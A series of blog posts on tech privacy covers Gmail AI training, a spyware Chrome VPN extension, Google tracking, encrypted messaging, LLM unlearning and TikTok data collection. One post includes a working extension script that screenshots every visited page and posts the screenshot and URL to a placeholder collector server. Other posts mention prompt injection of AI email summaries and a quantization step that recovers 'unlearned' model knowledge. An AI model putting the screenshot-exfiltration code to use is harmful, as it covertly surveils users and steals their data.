Google Data Slurps: Never, Ever

December 11, 2025

Here’s another lie from Googleland via Techspot: “Google Denies Gmail Reads Your Emails And Attachments To Train AI, But Here’s How To Opt-Out Anyway.” Google claims that it doesn’t use emails and attachments to train AI, but we know that’s false. Google does acknowledge that it uses user-generated data to personalize its applications, like Gmail. We all know that’s a workaround to use that data for other purposes.

The article includes instructions on how to opt out of information being used to train AI and “personalize” experiences.  Gmail users, however, have had bad experiences with that option, including the need to turn the feature off multiple times. 

Google claims it is committed to privacy but:

“Google has flatly denied using user content to train Gemini, noting that Gmail has offered some of these features for many years. However, the Workspace menu refers to newly added Gemini functionality several times.

The company also denied automatically modifying user permissions, but some people have reported needing multiple attempts to turn off smart features.”

There are also security vulnerabilities:

“In addition to raising privacy concerns, Gmail’s AI functionality has exposed serious vulnerabilities. In March, Mozilla found that attackers could easily inject prompts that would cause the client’s AI generated summaries to become phishing messages.”

Imagine that one little digital switch protects your privacy and data. Methinks it is a placebo effect.

Whitney Grace, December 11, 2025

An Interesting Piece of Free Software: FreeVPN.One

August 28, 2025

No AI. Just a dinobaby working the old-fashioned way.

I often hear about the wonders of open source software. Even an esteemed technologist like Pavel Durov offers free and open source software. He wants to make certain aspects of Telegram transparent. “Transparent” is a popular word in some circles. China’s Alibaba releases Qwen, and it is free. The commercial variants are particularly stimulating. Download free and open source software. If you run into a problem, just fix it yourself. Alternatively, you can pay for “commercial for fee” support. Choice! That’s the right stuff.

I read “Chrome VPN Extension with 100K Installs Screenshots All Sites Users Visit.” Note: By the time you read this, the Googlers may have blocked this extension or the people who rolled out this digital Trojan horse may have modified the extension’s behavior to something slightly less egregious.

Now back to the Trojan horse with a saddle blanket displaying the word “spyware.” I quote:

FreeVPN.One, a Chrome extension with over 100,000 installs and a verified badge on the Chrome Web Store, is exposed by researchers for taking screenshots of users’ screens and exfiltrating them to remote servers. A Koi Security investigation of the VPN tool reveals that it has been capturing full-page screenshots from users’ browsers, logging sensitive visual data like personal messages, financial dashboards, and private photos, and uploading it to aitd[.]one, a domain registered by the extension’s developer.

The explanation makes clear that one downloads, installs, and activates a Chrome extension. The software then captures what is on the screen and sends the data to the actor deploying the malware.
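
How hard is it to do what Koi Security describes? Not hard. Here is a minimal sketch, not FreeVPN.One’s actual code, showing that a Chrome extension granted broad permissions needs only two API calls to capture the screen and ship it to a server. The collector address below is a placeholder, not the real aitd[.]one endpoint:

```typescript
// background.ts -- a sketch of the capability, not FreeVPN.One's actual code.
// Runs as a Manifest V3 service worker; the manifest would request "tabs" plus a broad
// host permission such as "<all_urls>". The collector URL below is hypothetical.

chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete" || !tab.active) {
    return; // wait until the visible page has finished loading
  }
  // One API call captures whatever is rendered in the active tab as a PNG data URL.
  chrome.tabs.captureVisibleTab({ format: "png" }, (dataUrl) => {
    if (!dataUrl) {
      return;
    }
    // One more call ships the screenshot and the page URL to a remote server.
    void fetch("https://collector.example/upload", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ page: tab.url, screenshot: dataUrl }),
    });
  });
});
```

The Chrome Web Store review process flags some of this behavior, but the verified badge on FreeVPN.One suggests it does not catch everything.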

The developer says:

The extension’s developer claimed to Koi Security that the background screenshot functionality is part of a “security scan” intended to detect threats.

Whom does one believe? The threat detection outfit or the developer?

Can you recall a similar service? Hint: Capitalize the “r” in “recall.”

Can the same stealth (clumsy stealth in some cases) exist in other free software? Does a jet aircraft stay aloft when its engines fail?

Stephen E Arnold, August 28, 2025

Leave No Data Unslurped: A New Google T-Shirt Slogan?

August 25, 2025

No AI. Just a dinobaby working the old-fashioned way.

That mobile phone is the A Number One surveillance device ever developed. Not surprisingly, companies have figured out how to monetize the data flowing through the device. Try explaining the machinations of those “Accept Defaults” prompts to a clutch of 70-something bridge players. Then try explaining the same thing to the GenAI type of humanoid. One group looks at you with a baffled look on their faces. The other group stares into the distance and says, “Whatever.”

Now the Google wants more data, fresh information, easily updated. Because why not? “Google Expands AI-Based Age Verification System for Search Platform.” The write up says:

Google has begun implementing an artificial intelligence-based age verification system not only on YouTube but also on Google Search … Users in the US are reporting pop-ups on Google Search saying, “We’ve changed some of your settings because we couldn’t verify that you’re of legal age.” This is a sign of new rules in Google’s Terms of Service.

Why the scope creep from YouTube to “search” with its AI wonderfulness? The write up says:

The new restrictions could be another step in re-examining the balance between usability and privacy.

Wrong. The need for more data to stuff into the assorted AI “learning” services provides a reasonable rationale. Tossing in the “prevent harm” angle is just cover.

My view of the matter is:

  1. Mobile is a real-time service. Capturing more highly specific information is an obvious benefit to the Google.
  2. Users have zero awareness of how the data interactions work, and most don’t want to know or try to understand cross-correlation.
  3. Google’s goals are not particularized. This type of “fingerprint” just makes sense.

The motto could be “Leave no data unslurped.” What does this mean? Every Google service will require verification. The more one verifies, the fresher the identity information and the items that tag along and can be extracted. I think of this as similar to the process of rendering slaughtered livestock. The animal is dead, so what’s the harm?

None, of course. Google is busy explaining how little energy its data centers use to provide those helpful AI overview things.

Stephen E Arnold, August 25, 2025

DuckDuck Privacy. Go, Go, Go

August 8, 2025

We all know Google tracks us across the Web. But we can avoid that if we use a privacy-touting alternative, right? Not necessarily. Simple Analytics reveals, “Google Is Tracking You (Even When You Use DuckDuckGo).” Note that Simple Analytics is a Google Analytics competitor. So let us keep that in mind as we consider its blog’s assertions. Still, writer Iron Brands cites a study by Safety Detectives as he writes:

“The study analyzed browsing patterns in the US, UK, Switzerland, and Sweden. They used a virtual machine and VPN to simulate users in these countries. By comparing searches on Google and DuckDuckGo, researchers found Google still managed to collect data (often without the user knowing). Here’s how: Google doesn’t just track people through Search or Gmail. Its invisible code runs on millions of sites through Google Analytics, AdSense ads, YouTube embeds, and other background services like Fonts or Maps. That means even if you’re using DuckDuckGo, you’re not totally out of Google’s reach. In Switzerland and Sweden, using DuckDuckGo cut Google tracking by half. But in the US, more than 40% of visited pages still sent data back to Google, despite using a privacy search engine. That’s largely because many US websites rely on Google’s tools for ads and traffic analysis.”

And here we thought Google made such tools affordable out of generosity. The post continues:

“This isn’t just about search engines. It’s about how deeply Google is embedded into the internet’s infrastructure. Privacy-conscious users often assume that switching to DuckDuckGo or Brave is enough. This research says otherwise. … You need more than just a private browser or search engine to reduce tracking. Google’s reach comes from third-party scripts that websites willingly add.”
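
Curious how much of that reach shows up on a given site? A quick, admittedly crude sketch: fetch a page’s HTML and look for references to Google-owned hosts. The host list and the example URL are illustrative only, and scripts injected at runtime will be missed:

```typescript
// check-google-reach.ts -- a rough check: does a page's HTML reference Google-owned services?
// The host list is illustrative, not exhaustive, and only static HTML is inspected.
// Requires Node 18+ for the global fetch().

const GOOGLE_HOSTS = [
  "google-analytics.com",
  "googletagmanager.com",
  "googlesyndication.com", // AdSense
  "doubleclick.net",
  "fonts.googleapis.com",
  "maps.googleapis.com",
  "youtube.com/embed",
];

async function googleReferences(pageUrl: string): Promise<string[]> {
  const html = await (await fetch(pageUrl)).text();
  return GOOGLE_HOSTS.filter((host) => html.includes(host));
}

// Example: point it at any site you are curious about.
googleReferences("https://example.com").then((hits) => {
  console.log(
    hits.length ? `Google-owned references found: ${hits.join(", ")}` : "None found in static HTML.",
  );
});
```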

Brands implores owners of those websites to stop contributing to the problem. The write-up emphasizes that laws like the EU’s GDPR do not stem the tide. Countries with such laws, we are told, are still awash in Google’s trackers. The solution? For both websites and users to divest themselves of Google as much as possible. As it happens, Brands’ firm offers site owners just such a solution: an analytics platform that is “privacy-first and cookie-free.” Note that Beyond Search has not independently verified these claims. Concerned site owners may also want to check out other Google alternatives.

Cynthia Murrell, August 8, 2025

Apple and Google Texting Bad. So What Are the Options?

December 17, 2024

This blog post flowed from the sluggish and infertile mind of a real live dinobaby. If there is art, smart software of some type was probably involved.

This headline caught my attention: “FBI Warns iPhone and Android Users to Stop Texting Each Other for a Disturbing Reason.” What is that disturbing reason? According to the online article cited:

Both the FBI and US Cybersecurity and Infrastructure Security Agency are warning users to use a messaging app instead and one that uses end-to-end encryption. The warning comes amid a major cyberattack that has been called ‘unprecedented’ by the press. The attack has impacted telecommunications companies such as AT&T and Verizon. By using encrypted messaging apps, texters can keep their messages hidden from hackers. The hacking campaign has been nicknamed Salt Typhoon by Microsoft and it has not been fully solved. NBC News called it ‘one of the largest intelligence compromises in US history’.

Interesting. I recall that AT&T was not particularly chatty when information about a security compromise floated around. T-Mobile has experienced a few security issues as well. And Verizon? Same boat.

It is interesting that a sinking boat is an image several art generators refuse to produce. Anyway, after a lot of semantic wrangling, Midjourney spit out this good enough image.

After reading the article, I decided to navigate to X.com and ask Grok what the options were for a person who has muscle memory for texting folks from an Apple or Android mobile device. To use Grok, navigate to the tweeter, log in, and look for the Grok word on the displayed page. I went through these hoops slowly because when I queried Google about “how to use Grok,” the Google told me I had to sign up for a premium membership. That was wrong. No wonder Google is a service I find a bit short of the target.

Here are the services Grok (Mr. Musk’s smart software designed to compete in the Big Boy AI dodgeball contest) suggested. I quote the tweet thing’s smart output:

  • “Signal: Known for its strong privacy features, Signal offers end-to-end encryption for texts, voice calls, and video calls. It’s open-source, which adds to its credibility for privacy-conscious users. Signal is available on both Android and iOS, making it a great cross-platform option.
  • WhatsApp: With over 2 billion users, WhatsApp is a popular choice for cross-platform messaging. It supports text, voice, and video calls with end-to-end encryption. However, it’s worth noting that WhatsApp is owned by Meta (formerly known as Facebook), which might be a concern for privacy.
  • Telegram: Offers a wide range of features like large group chats, channels, bots, and self-destructing messages. While it provides end-to-end encryption in its “Secret Chat” mode, not all chats are encrypted by default, which could be a privacy concern for some users. Telegram is available on both Android and iOS.
  • Facebook Messenger: Another Meta-owned service, it’s widely used due to its integration with the social network. It supports free calls, video chats, and even has features like payment options in some regions. However, its privacy policies are often scrutinized.
  • Google Chat: Part of Google Workspace, this app provides a platform for both personal and work-related communications with features like spaces for team collaboration. It’s integrated well with other Google services, although its adoption outside of Google’s ecosystem is less widespread.
  • Viber: Offers free calls and messages, including stickers, GIFs, and public chats. Its user base is significant in certain regions but less so globally compared to WhatsApp or Telegram. Viber also has end-to-end encryption for calls and messages.
  • Spike: Described as an email-based messaging app, Spike combines email and chat functionality, making it suitable for both personal and professional use. It’s noted for its cross-platform capabilities and privacy focus.
  • SimpleX Chat: An open-source, privacy-focused chat app that doesn’t require phone numbers for registration, focusing on decentralization and user privacy.
  • Element (formerly Riot.im): Based on the Matrix protocol, it’s an open-source, decentralized platform that supports secure, encrypted communication. It’s good for those looking for privacy with the flexibility of self-hosting.
  • Beeper: An all-in-one messaging app that aims to unify various messaging services into one platform, although it has limitations like no official iMessage support due to Apple’s policies.”

Each of these apps is allegedly an E2EE or end-to-end encrypted messaging service. These are not presented in alphabetical order. I assume that Grok is providing the names in a rank ordering based on some criteria not explained to me. But that’s the future of smart software. Just do something and say, “Good enough.”

I noted several things about this list:

  1. There are no Chinese messaging apps. Is this censorship from an outfit seemingly concerned about free speech? I was surprised at the omission of QQ and WeChat with appropriate surveillance notices from Grok.
  2. One approach is for messaging clients to rely on the Extensible Messaging and Presence Protocol (XMPP). Conversations for Android and ChatSecure for iOS were at one time options.
  3. Inclusion of Telegram is definitely interesting because Pavel Durov has reversed course and now cooperates with law enforcement. Telegram has even played nice with anti-CSAM organizations. The about-face coincided with his detention by French authorities.
  4. The Grok listing does not include new and possibly interesting services like PrivateLine.io, which illustrates the shallow nature of the knowledge exposed to these smart systems. (Even Yandex.com lists this service in its search results.)
  5. Alphabetizing lists is just not part of the 2024 world, it seems.

There are some broader questions about encrypted messaging which are not addressed in the cited write up or the Grok “smart” output; for example:

  1. Are other messaging apps encrypted end to end, or are there “special” operations which make the content visible and loggable once the user sends the message?
  2. Is the encryption method used by these apps “unbreakable”?
  3. Are the encryption methods homegrown or based on easily inspected open source methods? (A sketch of one such open method appears after this list.)
  4. What entities have access to either the logged data about a message or to the message payload itself?
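
For question three, here is what an “easily inspected open source method” looks like in practice: a minimal sketch using the open source tweetnacl library. It is a toy, not the protocol of any app on Grok’s list, but it shows the core idea that only the recipient’s secret key can open the message:

```typescript
// e2ee-sketch.ts -- a toy illustration of end-to-end encryption with the open source tweetnacl library.
// This is not any messaging app's actual protocol; real apps add key ratcheting, identity checks, etc.
import nacl from "tweetnacl";

// Each party generates a keypair; only the public halves are ever shared.
const alice = nacl.box.keyPair();
const bob = nacl.box.keyPair();

// Alice encrypts for Bob. A relay server in the middle sees only the ciphertext and the nonce.
const nonce = nacl.randomBytes(nacl.box.nonceLength);
const plaintext = new TextEncoder().encode("meet at the usual place");
const ciphertext = nacl.box(plaintext, nonce, bob.publicKey, alice.secretKey);

// Only Bob's secret key (plus Alice's public key) opens the box; tampering makes open() fail.
const opened = nacl.box.open(ciphertext, nonce, alice.publicKey, bob.secretKey);
console.log(opened ? new TextDecoder().decode(opened) : "decryption failed");
```

The broader questions above, such as logging, metadata, and who holds the keys, are exactly what a snippet like this cannot answer.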

The alarm has been sounded about the failure of some US telecommunications companies to protect their own systems and by extension the security of their customers. But numerous questions remain with partial or no answers. Answers are, from my point of view, thin.

Stephen E Arnold, December 17, 2024

Does Smart Software Forget?

November 21, 2024

A recent paper challenges the big dogs of AI, asking, “Does Your LLM Truly Unlearn? An Embarrassingly Simple Approach to Recover Unlearned Knowledge.” The study was performed by a team of researchers from Penn State, Harvard, and Amazon and published on the research platform arXiv. True or false, it is a nifty poke in the eye for the likes of OpenAI, Google, Meta, and Microsoft, who may have overlooked the obvious. The abstract explains:

“Large language models (LLMs) have shown remarkable proficiency in generating text, benefiting from extensive training on vast textual corpora. However, LLMs may also acquire unwanted behaviors from the diverse and sensitive nature of their training data, which can include copyrighted and private content. Machine unlearning has been introduced as a viable solution to remove the influence of such problematic content without the need for costly and time-consuming retraining. This process aims to erase specific knowledge from LLMs while preserving as much model utility as possible.”

But AI firms may be fooling themselves about this method. We learn:

“Despite the effectiveness of current unlearning methods, little attention has been given to whether existing unlearning methods for LLMs truly achieve forgetting or merely hide the knowledge, which current unlearning benchmarks fail to detect. This paper reveals that applying quantization to models that have undergone unlearning can restore the ‘forgotten’ information.”

Oops. The team found as much as 83% of data thought forgotten was still there, lurking in the shadows. The paper offers an explanation for the problem and suggestions to mitigate it. The abstract concludes:

“Altogether, our study underscores a major failure in existing unlearning methods for LLMs, strongly advocating for more comprehensive and robust strategies to ensure authentic unlearning without compromising model utility.”
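
The intuition is easy to show with a toy example. This is not the paper’s experimental setup, just made-up numbers illustrating why coarse quantization can erase a small “unlearning” nudge:

```typescript
// quantization-toy.ts -- a toy illustration of the rounding intuition, not the paper's method.
// If "unlearning" only nudges a weight slightly, coarse quantization can snap it back to the
// same grid point as the original weight, and the nudge effectively disappears.

// Symmetric 4-bit quantization: map a weight onto a coarse grid and back.
function quantizeDequantize(w: number, maxAbs: number, bits = 4): number {
  const levels = 2 ** (bits - 1) - 1; // 7 positive levels for int4
  const scale = maxAbs / levels;
  return Math.round(w / scale) * scale;
}

const maxAbs = 1.0;
const original = [0.52, -0.31, 0.88, -0.07]; // made-up pre-unlearning weights
const nudge = 0.02;                           // small update applied by an "unlearning" pass
const unlearned = original.map((w) => w + nudge);

const qOriginal = original.map((w) => quantizeDequantize(w, maxAbs));
const qUnlearned = unlearned.map((w) => quantizeDequantize(w, maxAbs));

// When the nudge is much smaller than the quantization step (about 0.14 here), most weights
// round back to the same grid point, so the quantized "unlearned" model matches the original.
console.log("quantized original :", qOriginal);
console.log("quantized unlearned:", qUnlearned);
console.log("identical after quantization?", qOriginal.every((w, i) => w === qUnlearned[i]));
```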

See the paper for all the technical details. Will the big tech firms take the researchers’ advice and improve their products? Or will they continue letting their investors and marketing departments lead them by the nose?

Cynthia Murrell, November 21, 2024

Lark Flies Home with TikTok User Data, DOJ Alleges

August 7, 2024

An Arnold’s Law of Online Content states simply: If something is online, it will be noticed, captured, analyzed, and used to achieve a goal. That is why we are unsurprised to learn, as TechSpot reports, “US Claims TikTok Collected Data on Users, then Sent it to China.” Writer Skye Jacobs reveals:

“In a filing with a federal appeals court, the Department of Justice alleges that TikTok has been collecting sensitive information about user views on socially divisive topics. The DOJ speculated that the Chinese government could use this data to sow disruption in the US and cast suspicion on its democratic processes. TikTok has made several overtures to the US to create trust in its privacy and data controls, but it has also been reported that the service at one time tracked users who watched LGBTQ content. The US Justice Department alleges that TikTok collected sensitive data on US users regarding contentious issues such as abortion, religion and gun control, raising concerns about privacy and potential manipulation by the Chinese government. This information was reportedly gathered through an internal communication tool called Lark.”

Lark is also owned by TikTok parent company ByteDance and is integrated into the app. Alongside its role as a messaging platform, Lark has apparently been collecting a lot of very personal user data and sending it home to Chinese servers. The write-up specifies some of the DOJ’s concerns:

“They warn that the Chinese government could potentially instruct ByteDance to manipulate TikTok’s algorithm to use this data to promote certain narratives or suppress others, in order to influence public opinion on social issues and undermine trust in the US’ democratic processes. Manipulating the algorithm could also be used to amplify content that aligns with Chinese state narratives, or downplay content that contradicts those narratives, thereby shaping the national conversation in a way that serves Chinese interests.”

Perhaps most concerning, the brief warns, China could direct ByteDance to use the data to “undermine trust in US democracy and exacerbate social divisions.” Yes, that tracks. Meanwhile, TikTok insists any steps our government takes against it infringe on US users’ First Amendment rights. Oh, the irony.

In the face of the US government’s demand that it sell off TikTok or face a ban, ByteDance has offered a couple of measures designed to alleviate concerns. So far, though, the Biden administration is standing firm.

Cynthia Murrell, August 7, 2024

Perfect for Spying, Right?

June 28, 2024

And we thought noise-cancelling headphones were nifty. The University of Washington’s UW News announces “AI Headphones Let Wearer Listen to a Single Person in a Crowd, by Looking at them Just Once.” That will be a real help for the hard-of-hearing. Also spies. Writers Stefan Milne and Kiyomi Taguchi explain:

“A University of Washington team has developed an artificial intelligence system that lets a user wearing headphones look at a person speaking for three to five seconds to ‘enroll’ them. The system, called ‘Target Speech Hearing,’ then cancels all other sounds in the environment and plays just the enrolled speaker’s voice in real time even as the listener moves around in noisy places and no longer faces the speaker. … To use the system, a person wearing off-the-shelf headphones fitted with microphones taps a button while directing their head at someone talking. The sound waves from that speaker’s voice then should reach the microphones on both sides of the headset simultaneously; there’s a 16-degree margin of error. The headphones send that signal to an on-board embedded computer, where the team’s machine learning software learns the desired speaker’s vocal patterns. The system latches onto that speaker’s voice and continues to play it back to the listener, even as the pair moves around. The system’s ability to focus on the enrolled voice improves as the speaker keeps talking, giving the system more training data.”

If the sound quality is still not satisfactory, the user can refresh enrollment to improve clarity. Though the system is not commercially available, the code used for the prototype is available for others to tinker with. It is built on last year’s “semantic hearing” research by the same team. Target Speech Hearing still has some limitations. It does not work if multiple loud voices are coming from the target’s direction, and it can only eavesdrop on, er, listen to one speaker at a time. The researchers are now working on bringing their system to earbuds and hearing aids.
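
The claim that the target’s voice should “reach the microphones on both sides of the headset simultaneously” is straightforward far-field geometry. The sketch below is not the UW prototype’s code, and the microphone spacing is an assumed value, but it shows how an inter-microphone delay maps to a bearing and why a near-zero delay means the wearer is facing the speaker:

```typescript
// bearing-from-delay.ts -- the far-field geometry behind "look at the speaker to enroll them."
// Not the UW prototype's code; mic spacing is an assumed value for illustration.

const SPEED_OF_SOUND = 343; // m/s in room-temperature air
const MIC_SPACING = 0.18;   // metres between the left and right headset microphones (assumed)

// A source at angle theta (0 = straight ahead) makes the sound travel an extra
// MIC_SPACING * sin(theta) metres to reach the far microphone.
function delaySecondsForAngle(thetaDegrees: number): number {
  const theta = (thetaDegrees * Math.PI) / 180;
  return (MIC_SPACING * Math.sin(theta)) / SPEED_OF_SOUND;
}

// Invert it: estimate the bearing from a measured inter-microphone delay.
function angleDegreesForDelay(delaySeconds: number): number {
  const sinTheta = (delaySeconds * SPEED_OF_SOUND) / MIC_SPACING;
  return (Math.asin(Math.max(-1, Math.min(1, sinTheta))) * 180) / Math.PI;
}

// Facing the speaker: both mics hear the voice at (almost) the same instant.
console.log("delay at 0 degrees :", delaySecondsForAngle(0), "s");
// The enrollment tolerance quoted in the article is about 16 degrees off-axis.
console.log("delay at 16 degrees:", delaySecondsForAngle(16).toFixed(6), "s");
// With these assumptions, a measured delay of ~0.000145 s corresponds to roughly 16 degrees.
console.log("bearing for 0.000145 s delay:", angleDegreesForDelay(0.000145).toFixed(1), "degrees");
```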

Cynthia Murrell, June 28, 2024

Our Privacy Is Worth $47 It Seems

June 6, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Multimillion-dollar lawsuits made on behalf of the consumer keep businesses in check. These lawsuits fight greedy companies that want to squeeze every last cent from consumers and take advantage of their ignorance. Thankfully, many of these lawsuits are settled in favor of the consumers, like the Federal Trade Commission (FTC) vs. Ring. Unfortunately, the victims aren’t getting much in the way of compensation, says OM in “You Are Worth $47.”

Ring is a camera security company that allowed its contractors and employees to access users’ private data. The FTC and Ring reached a settlement in the case, resulting in $5.6 million being distributed to 117,000 victims. That works out to about $47 per person. That amount will at least pay for a tank of gas or a meal for two in some parts of the country. It’s better than what other victims received:

“That is what your data (and perhaps your privacy) is worth — at least today. It is worth more than what T-Mobile or Experian paid as a fine per customer: $4.50 and $9, respectively. This minuscule fine is one of the reasons why companies get away with playing loose and easy with our privacy and data.”

OM is exactly right that the small compensation amounts only deepen consumers’ apathy. What’s the point of fighting these mega conglomerates when the payout is so small? Individuals, unless they’re backed by a boatload of money and a strong sense of stubborn, righteous justice, won’t fight big businesses.

It’s the responsibility of lawmakers to fight these companies, but they don’t. They don’t fight for consumers because they’re either in the pocket of big businesses or they’re struck down before they even begin.

Whitney Grace, June 6, 2024

Bugged? Hey, No One Can Get Our Data

December 22, 2023

This essay is the work of a dumb dinobaby. No smart software required.

I read “The Obscure Google Deal That Defines America’s Broken Privacy Protections.” In the cartoon below, two young people are confident that their lunch will be undisturbed. No “bugs” will chow down on their hummus, sprout sandwiches, or their information. What happens, however, is that the young picnic fans cannot perceive what is out of sight. Are these “bugs” listening? Yep. They are. 24×7.

What the young fail to perceive is that “bugs” are everywhere. These digital creatures are listening, watching, harvesting, and consuming every scrap of information. The image of the picnic evokes an experience unfolding in real time. Thanks, MSFT Copilot. My notion of “bugs” is obviously different from yours. Good enough and I am tired of finding words you can convert to useful images.

The essay explains:

While Meta, Google, and a handful of other companies subject to consent decrees are bound by at least some rules, the majority of tech companies remain unfettered by any substantial federal rules to protect the data of all their users, including some serving more than a billion people globally, such as TikTok and Apple.

The situation is simple: Major centers of techno gravity remain unregulated. Lawmakers, regulators, and “users” either did not understand or just believed what lobbyists told them. The senior executives of certain big firms smiled, said “Senator, thank you for that question,” and continued to build out their “bug” network. Do governments want to lose their pride of place with these firms? Nope. Why? Just reference bad actors who commit heinous acts and invoke “protect our children.” When these refrains from the techno feudal playbook sound, calls to take meaningful action become little more than a faint background hum.

But the article continues:

…there is diminishing transparency about how Google’s consent decree operates.

I think I understand. Google-type companies pretend to protect “privacy.” Who really knows? Just ask a Google professional. The answer in my experience is, “Hey, dude, I have zero idea.”

How does Wired, the voice of the techno age, conclude its write up? Here you go:

The FTC agrees that a federal privacy law is long overdue, even as it tries to make consent decrees more powerful. Samuel Levine, director of the FTC’s Bureau of Consumer Protection, says that successive privacy settlements over the years have become more limiting and more specific to account for the growing, near-constant surveillance of Americans by the technology around them. And the FTC is making every effort to enforce the settlements to the letter…

I love the “every effort.” The reality is that the handling of online data collection presages the trajectory for smart software. We live with bugs. Now those bugs can “think”, adapt, and guide. And what’s the direction in which we are now being herded? Grim, isn’t it?

Stephen E Arnold, December 22, 2023
